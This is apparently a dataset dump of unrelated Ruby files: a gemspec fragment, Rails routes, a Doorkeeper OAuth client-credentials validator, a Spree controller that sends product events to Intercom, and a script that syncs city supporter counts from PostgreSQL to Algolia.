spec.add_development_dependency 'guard-rspec'
spec.add_development_dependency 'terminal-notifier-guard'
spec.add_development_dependency 'rubocop'
spec.add_development_dependency 'guard-rubocop'
spec.add_development_dependency 'guard-bundler'
spec.add_development_dependency 'pry'
spec.add_development_dependency 'codeclimate-test-reporter'
end
| 40.151515 | 79 | 0.710943 |
4a6a16ce8e28a1dc02e04921a5327c18956951f2
| 104 |
Solitr::Application.routes.draw do
root :to => "play#index"
get ':action', :controller => :play
end
| 20.8 | 37 | 0.673077 |
21e20effc83bad6159dc3f04e32936cc89f74083
| 1,073 |
require 'doorkeeper/validations'
require 'doorkeeper/oauth/scopes'
require 'doorkeeper/oauth/helpers/scope_checker'
module Doorkeeper
module OAuth
class ClientCredentialsRequest
class Validation
include Validations
include OAuth::Helpers
validate :client, error: :invalid_client
validate :scopes, error: :invalid_scope
def initialize(server, request)
@server, @request, @client = server, request, request.client
validate
end
private
def validate_client
@client.present?
end
def validate_scopes
return true unless @request.scopes.present?
application_scopes = if @client.present?
@client.application.scopes
else
''
end
ScopeChecker.valid?(
@request.scopes.to_s,
@server.scopes,
application_scopes
)
end
end
end
end
end
| 23.326087 | 70 | 0.54986 |
03333cc2dd2c9ffa174e1c749ad8ada9b1b3c956
| 742 |
Spree::ProductsController.class_eval do
include Spree::EventTrackerController
after_action :create_event_on_intercom, only: [:show, :index], if: :product_search_conditions_satisfied?
private
def show_data
{
product_id: @product.id,
time: Time.current.to_i,
user_id: spree_current_user.id
}
end
def index_data
{
filter: @searcher.search.to_s,
keyword: params[:keywords],
taxon_id: params[:taxon],
time: Time.current.to_i,
user_id: spree_current_user.id
}
end
def product_search_conditions_satisfied?
return true unless action_name == 'index'
params[:keywords].present? || @searcher.search.present?
end
end
| 22.484848 | 106 | 0.654987 |
edcd552ba45e8e7386ca9ac5d32733ff47888cf0
| 2,420 |
require_relative '../config/keys.local.rb'
require 'csv'
require 'uri'
require 'net/http'
require 'json'
require 'pg'
require 'openssl'
require 'algoliasearch'
require 'wannabe_bool'
db=PG.connect(
"dbname"=>PGNAME,
"user"=>PGUSER,
"password"=>PGPWD,
"host"=>PGHOST,
"port"=>PGPORT
)
Algolia.init :application_id=>ALGOLIA_ID, :api_key=>ALGOLIA_KEY
index_villes=Algolia::Index.new("villes")
all_cities_list=<<END
select z.population, z.lon_deg,z.lat_deg,z.city_id, z.zipcode, z.slug, count(*) as nb_supporters,(100*(count(*)::float/z.population::float))::numeric(5,3) as taux from (select city_id, zipcode, slug,lon_deg,lat_deg,population from cities group by slug,lon_deg,lat_deg,population,zipcode,city_id) as z inner join citizens as c on (c.city_id=z.city_id) group by z.city_id,z.zipcode, z.slug, z.lat_deg, z.lon_deg, z.population;
END
big_cities_list=<<END
select z.population, z.lon_deg,z.lat_deg,z.city_ids, z.zipcodes, z.slug, count(*) as nb_supporters,(100*(count(*)::float/z.population::float))::numeric(5,3) as taux from (select array_agg(cities.city_id) as city_ids, array_agg(zipcode) as zipcodes, slug,lon_deg,lat_deg,population from cities group by slug,lon_deg,lat_deg,population) as z inner join citizens as c on (array_length(z.city_ids,1)>1 AND c.city_id::int = ANY (z.city_ids::int[])) group by z.city_ids,z.zipcodes, z.slug, z.lat_deg, z.lon_deg, z.population;
END
updates=[]
res=db.exec(all_cities_list)
if not res.num_tuples.zero? then
res.each do |r|
updates.push({
"_geoloc"=>{"lat"=>r['lat_deg'].to_f,"lng"=>r['lon_deg'].to_f},
"nb_supporters"=>r['nb_supporters'],
"taux"=>r['taux'],
"objectID"=>r['city_id']
})
puts "updating #{r['slug']}"
end
end
index_villes.partial_update_objects(updates)
updates=[]
res=db.exec(big_cities_list)
if not res.num_tuples.zero? then
res.each do |r|
object_ids=eval(r['city_ids'].gsub('{','[').gsub('}',']'))
zipcodes=eval(r['zipcodes'].gsub('{','[').gsub('}',']'))
zipcodes_text=zipcodes.join(', ')
first=object_ids[0]
puts "using #{first} as first"
object_ids.each do |a|
puts "deleting #{a}" if a!=first
index_villes.delete_object(a) if a!=first
end
updates.push({
"zipcode"=>zipcodes_text,
"_geoloc"=>{"lat"=>r['lat_deg'].to_f,"lng"=>r['lon_deg'].to_f},
"nb_supporters"=>r['nb_supporters'],
"taux"=>r['taux'],
"objectID"=>first.to_s
})
end
end
index_villes.partial_update_objects(updates)
| 38.412698 | 519 | 0.709504 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.